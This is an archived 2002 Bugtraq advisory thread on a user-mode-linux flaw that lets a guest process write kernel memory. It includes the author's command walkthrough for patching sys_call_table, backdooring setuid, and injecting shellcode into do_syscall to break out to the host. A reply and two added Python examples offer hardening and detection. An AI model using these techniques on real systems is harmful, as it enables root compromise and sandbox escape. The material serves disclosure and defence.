7900272 2002-01-28 13:16 +1100  /185 lines/ Andrew Griffiths <andrewg@tasmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-28 21:18 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20711>
Subject: user-mode-linux problems
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201280216.g0S2GvH06047@franklin.nt.tas.gov.au>

Program: User-mode-linux
Version tested: patch-2.4.17-8 [ I assume all previous versions would be ]
Not vulnerable: patch-2.4.17-9 [ Haven't tested any different techniques.]

Now for something completely different. Anything in []'s is my
comments to my article... deal with it.

Description:
------------

User-mode-linux is used to enhance kernel development by providing a
debuggable kernel, and also as a safebox for some applications.

[ Hereafter, uml refers to user-mode-linux. ]

Problem:
--------

A user process can write into kernel memory, which will allow a
person to get root inside the uml "box", and the possibility to break
out of the uml "box", into the real one.

This can happen even if the jail and honeypot options are turned
on. [ Though I suspect the version I was testing was half-way through
implementing them ]

Some effects can happen, such as causing the uml processes to die,
and making a process chew up heaps of cpu time indefinitely.

Reproducing:
------------

I used the small debian 2.2 root fs to play around with, on a host
kernel of 2.4.17ctx-5 (vserver context security patch).

To start it up I used:

[andrewg@blackhole linux]$ ./linux ubd0=debcow,root_fs_debian2.2_small jail=1 honeypot=1 jail honeypot

[ I'm being doubly cautious, and looking at the jail setup code, I
don't think it would have been bothered by my putting it in there
twice. ]

Mitigation:
-----------

Well, to prevent some of the problems, I suggest running the uml in a
chroot()ed environment, with memory and cpu restrictions turned on.

Don't allow people to run their own code. Well, that's rather tricky,
since if they can overflow anything (just a normal program) and
execute code of their own choosing, you have pretty much lost
already...

[ Free tip for those who use it for high security. Put all the
binaries on a separate ubd device, and make it non-writable by
the uml process. That way you don't have the
replaced-replaced-binary problem, however, /bin would be hard to do. ]

Fix:
----

Upgrade.

Exploit:
--------

There is no exploit as such yet, just a tool to help you exploit
it. Attached is a program for you to play around with.

This program is somewhat simple, and definitely not
finished. However, it does everything I needed it to do, plus a couple
of other things.

For the commands where you don't specify the offset of sys_call_table, it
uses the built-in one at 0xa019f650. [ Which is no longer valid for my
./linux, and most likely not for your system. ]

[andrewg@blackhole mpmt]$ ./mpmt -h
./mpmt: invalid option -- h [ Hey, I said it wasn't finished. ]
Multi-Purpose Modification Tool v0.6 by Andrew Griffiths
./mpmt -1 [ -2 ] [ -o ] [ -p | -f | -s ] [ -r ]

./mpmt -o 0xa020ee1f -p -1 61
        Would print out the offset of chroot at the sys_call_table
        location of 0xa020ee1f

./mpmt -1 23 -2 36
        Would replace setuid()'s location in sys_call_table with
        sync()s function.

./mpmt -1 23 -2 36 -r
        Would replace setuid()'s location in sys_call_table with
        sync()s function, and restore it back to it would in n
        seconds. (time default is 30 seconds)

For values of these numbers, look in /usr/include/asm/unistd.h

Also, you can do abiratory read and writes on kernel memory,
with the -a for the address, -c for how much to copy, -R to
read, and -W to write and -F to specify file.
[andrewg@blackhole mpmt]$

To do things like play around with the sys_call_table, you'll need the
address of it. To get it, just do:

[andrewg@blackhole linux]$ nm -a linux | grep sys_call_table
a01bb744 D sys_call_table
00000000 a sys_call_table.c
[andrewg@blackhole linux]$

and the first address is the sys_call_table. I haven't looked into
determining the sys_call_table address while you're in it. I suspect
it could be done by looking at the kernel memory (which is an elf
file), and finding the address via the global offset table, or
something. If it isn't stripped, you should be laughing. Once you
can work these out, you should be able to write a version independent
exploit.

Since you've already seen some of the things it does, I'll explain
the bottom parts.

To get a copy of the first 256 bytes of the sys_call_table struct,
and to dump it into systable:

andrewg@usermode:~$ ./mpmt -a 0xa01bb744 -c 256 -R -F systable

To get the first 2048 bytes of setuid so you can backdoor it:

andrewg@usermode:~$ ./mpmt -o 0xa01bb744 -p -1 23
Location in memory where function 23 is 0xa0018024
andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -R
andrewg@usermode:~$ [ Now run ndisasm and patch and then run... ]
andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -W

The sharp reader will have already noticed that we could replace the
getuid with a harmless syscall such as sync, and then call su || su
-c "shell script" to do what we want. However, on my system, there's
a couple of problems, like it starting off way too many su processes
or them dying straight away. However the -c one seems to work...

[ News just in... ]

And now for the ultimate exploit against User-mode-linux: Breaking
out of it. To break out of uml, you need to cause the tracer program
to execute code of your choosing. [ No shit!?! That's because the
tracer pid isn't being ptraced itself. Sidenote: If you
could kill the tracer, you might be able to execute code... ] We can
accomplish this by writing into certain areas of memory... The
function I have chosen to target is do_syscall.

Now, for the exploitation:

[andrewg@blackhole andrewg]$ nm -a /usr/src/linux/linux | grep do_syscall
a01000f0 T do_syscall
[andrewg@blackhole andrewg]$ cat > /tmp/sh <<_EOF_
#!/bin/sh
echo OWNED > /tmp/umlisbroken
_EOF_
[andrewg@blackhole andrewg]$ chmod +x /tmp/sh

And now for the usermode linux part, where ex is just a program that
spits out standard Aleph1 (Phrack 49) shellcode.

andrewg@usermode:~$ ./ex | sed s/bin/tmp/ > exploit_code
andrewg@usermode:~$ ./mpmt -a 0xa01000f0 -c 43 -W -F exploit_code 

At this point, the screen where you started UML probably shows a
message like: Kernel panic: Error mapping a page - errno = 9 [ Bad
File descriptor ]

I suspect it's trying to mmap() a page from somewhere with a fd that
isn't valid for the real kernel. ('Cause it's no longer being
ptrace()d.)

And now [Drum roll please]

[andrewg@blackhole andrewg]$ cat /tmp/umlisbroken
OWNED
[andrewg@blackhole andrewg]$ 

You may be asking why the shellcode doesn't do anything more interesting than 
exec()ing /tmp/sh, well, you gotta remember this is for "proof of concept"...

Don't forget to do a "killall -9 linux" and restart it, 'cause you've
just killed it....




--
www.tasmail.com
(7900272) /Andrew Griffiths <andrewg@tasmail.com>/(Rewrapped)
Attachment (application/octet-stream) in text 7900273
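The post dumps the first 256 bytes of sys_call_table to a file with mpmt (-R -F systable) and maps syscall numbers to names through /usr/include/asm/unistd.h. From the defender's side the same dump is the thing to compare against a known-good copy, which is what the following added example does. It is not code from the post or from the mpmt tool: it parses `#define __NR_name N` lines in the style of asm/unistd.h, treats a dump as consecutive little-endian 32-bit pointers (one per syscall number, as on the i386 UML the post uses), reports every entry that differs from the baseline, and flags the case the post describes where an entry is simply redirected at another syscall's handler. The handler addresses and the three unistd.h lines are constructed for the example.

```python
import re
import struct
from typing import Dict, List, Tuple

# Constructed stand-in for the lines of interest in /usr/include/asm/unistd.h
# (the i386 numbers the post quotes: setuid 23, sync 36, chroot 61).
SAMPLE_UNISTD = """\
#define __NR_setuid 23
#define __NR_sync 36
#define __NR_chroot 61
"""

NR_RE = re.compile(r"^\s*#\s*define\s+__NR_(\w+)\s+(\d+)\b")


def parse_unistd(text: str) -> Dict[int, str]:
    """Map syscall number -> name from asm/unistd.h-style #define lines."""
    names: Dict[int, str] = {}
    for line in text.splitlines():
        m = NR_RE.match(line)
        if m:
            names[int(m.group(2))] = m.group(1)
    return names


def unpack_table(dump: bytes) -> List[int]:
    """Split a raw sys_call_table dump into 32-bit little-endian pointers."""
    if len(dump) % 4:
        raise ValueError("dump length %d is not a multiple of 4" % len(dump))
    return list(struct.unpack("<%dI" % (len(dump) // 4), dump))


def diff_tables(baseline: bytes, current: bytes,
                names: Dict[int, str]) -> List[Tuple[int, str, int, int]]:
    """Return (syscall_nr, name, old_ptr, new_ptr) for each entry that changed."""
    old, new = unpack_table(baseline), unpack_table(current)
    if len(old) != len(new):
        raise ValueError("dumps cover different numbers of entries")
    return [(nr, names.get(nr, "?"), a, b)
            for nr, (a, b) in enumerate(zip(old, new)) if a != b]


def explain(baseline: bytes, current: bytes, names: Dict[int, str]) -> List[str]:
    """One line per changed entry, noting whether the new pointer is another
    entry's handler (a syscall swap) or lies outside the original table."""
    by_ptr = {ptr: nr for nr, ptr in enumerate(unpack_table(baseline))}
    lines = []
    for nr, name, a, b in diff_tables(baseline, current, names):
        msg = "syscall %d (%s): 0x%08x -> 0x%08x" % (nr, name, a, b)
        if b in by_ptr:
            other = by_ptr[b]
            msg += " [now aliases syscall %d (%s)]" % (other, names.get(other, "?"))
        else:
            msg += " [points outside the original table]"
        lines.append(msg)
    return lines


def constructed_dumps() -> Tuple[bytes, bytes]:
    """Constructed 256-byte dumps: a clean baseline, and one where entry 23
    (setuid) has been overwritten with entry 36's (sync's) pointer."""
    ptrs = [0xA0010000 + 0x100 * nr for nr in range(64)]  # made-up handler addresses
    baseline = struct.pack("<64I", *ptrs)
    ptrs[23] = ptrs[36]
    return baseline, struct.pack("<64I", *ptrs)


if __name__ == "__main__":
    base, cur = constructed_dumps()
    for line in explain(base, cur, parse_unistd(SAMPLE_UNISTD)):
        print(line)
```

In use, `baseline` would be a dump taken right after boot and `current` a fresh one; the comparison only catches changes to the table itself, so a handler patched in place (the setuid.dump -W case in the post) needs the same treatment applied to a dump of the handler's code.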
7900273 2002-01-28 13:16 +1100  /31 lines/ Andrew Griffiths <andrewg@tasmail.com>
Attachment filename: "mpmt.tgz"
Imported: 2002-01-28 21:18 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20712>
Attachment (text/plain) to text 7900272
Subject: Attachment (mpmt.tgz) to: user-mode-linux problems
------------------------------------------------------------
(7900273) /Andrew Griffiths <andrewg@tasmail.com>/(Rewrapped)
7921665 2002-01-31 09:13 -0600  /46 lines/ Ajax <ajax@firest0rm.org>
Sent by: joel@lysator.liu.se
Imported: 2002-01-31 21:37 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: Andrew Griffiths <andrewg@tasmail.com>
Recipient: Bugtraq (import) <20758>
Comment on text 7900272 by Andrew Griffiths <andrewg@tasmail.com>
Subject: Re: user-mode-linux problems
------------------------------------------------------------
From: Ajax <ajax@firest0rm.org>
To: <bugtraq@securityfocus.com>
Cc: Andrew Griffiths <andrewg@tasmail.com>
Message-ID: <Pine.BSO.4.33.0201310847170.6711-100000@belial.firest0rm.org>

On Mon, 28 Jan 2002, Andrew Griffiths wrote:

> Program: User-mode-linux
> Version tested: patch-2.4.17-8 [ I assume all previous versions would be ]
> Not vulnerable: patch-2.4.17-9 [ Haven't tested any different techniques.]
>
> Now for something completely different. Anything in []'s is my comments to
> my article... deal with it.
> <snip>
>
> A user process can write into kernel memory, which will allow a person
> to get root inside the uml "box", and the possibility to break out of
> the uml "box", into the real one.
>
> This can happen even if the jail and honeypot options are turned on. [
> Though I suspect the version I was testing was half-way through
> implementing them ]

you're right about the "half-way through" bit.  2.4.17-9um is much
better in this respect.

the honeypot option explicitly *reduces* security:

/usr/src/uml/linux$ ./linux --help | grep -A 3 honeypot
honeypot
    This makes UML put process stacks in the same location as they are
    on the host, allowing expoits such as stack smashes to work against
    UML.
/usr/src/uml/linux$ ./linux --version
2.4.16-2um

as of 2.4.17-9um, the "honeypot" option turns on the "jail" option;
thus the most secure setup is to run uml with "jail" and not
"honeypot".

also, running uml itself within a chroot, as its own UID, and with no
capabilities, quite effectively limits the damage an attacker can do
in breaking the uml container.  but you all knew that already.

-=:[ ajax (firest0rm)
(7921665) /Ajax <ajax@firest0rm.org>/-----(Rewrapped)
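Both the Mitigation section of the original post and this reply recommend the same containment for the UML tracer: a chroot, its own unprivileged UID with no capabilities, memory and CPU limits, and the "jail" option without "honeypot" (which deliberately puts stacks at host addresses). The launcher below is an added example, not code from either poster or from the UML project, showing those steps in the order they have to happen: resource limits first, then chroot and chdir, then shed groups, GID and UID (leaving root also drops the capability set), and only then exec the kernel binary. The chroot directory, UID/GID, limit values and the `/linux` path inside the chroot are assumptions for illustration.

```python
import os
import resource
import sys
from typing import List

UML_ROOT = "/srv/uml-jail"        # assumed chroot directory holding /linux and the root_fs
UML_UID, UML_GID = 1500, 1500     # assumed unprivileged account dedicated to UML
MEM_BYTES = 256 * 1024 * 1024     # assumed address-space cap for the tracer process
CPU_SECONDS = 3600                # assumed CPU-time cap for the tracer process


def check_options(opts: List[str]) -> List[str]:
    """Return the problems with a UML kernel command line (empty list = acceptable).

    Requires the "jail" option and refuses "honeypot", since honeypot places
    process stacks at the same addresses as on the host (and only implies
    jail from 2.4.17-9um onwards)."""
    problems = []
    if not any(o in ("jail", "jail=1") for o in opts):
        problems.append("jail not enabled")
    for o in opts:
        if o == "honeypot" or o.startswith("honeypot="):
            problems.append("honeypot puts stacks at host addresses; drop it")
    return problems


def build_argv(opts: List[str]) -> List[str]:
    """argv for the guest kernel inside the chroot, after validating the options."""
    problems = check_options(opts)
    if problems:
        raise ValueError("; ".join(problems))
    return ["/linux"] + list(opts)


def confine_and_exec(opts: List[str]) -> None:
    """Apply limits, enter the chroot, drop privileges, exec UML. Needs root."""
    argv = build_argv(opts)
    # Limits are inherited across exec, so set them before changing anything else.
    resource.setrlimit(resource.RLIMIT_AS, (MEM_BYTES, MEM_BYTES))
    resource.setrlimit(resource.RLIMIT_CPU, (CPU_SECONDS, CPU_SECONDS))
    # chroot while still root, then chdir so no open handle points outside it.
    os.chroot(UML_ROOT)
    os.chdir("/")
    # Supplementary groups, then GID, then UID: once UID is non-root the
    # capability set is cleared and setgid/setgroups would no longer be allowed.
    os.setgroups([])
    os.setgid(UML_GID)
    os.setuid(UML_UID)
    os.execv(argv[0], argv)


if __name__ == "__main__":
    guest_opts = sys.argv[1:] or ["ubd0=root_fs", "jail"]
    problems = check_options(guest_opts)
    if problems:
        sys.exit("refusing to start UML: " + "; ".join(problems))
    confine_and_exec(guest_opts)
```

The chroot only limits what a tracer compromise can reach on the host filesystem; the resource limits cover the "chew up heaps of cpu time" effect from the original post, and the UID change is what keeps a broken-out process from inheriting anything the launching account could do.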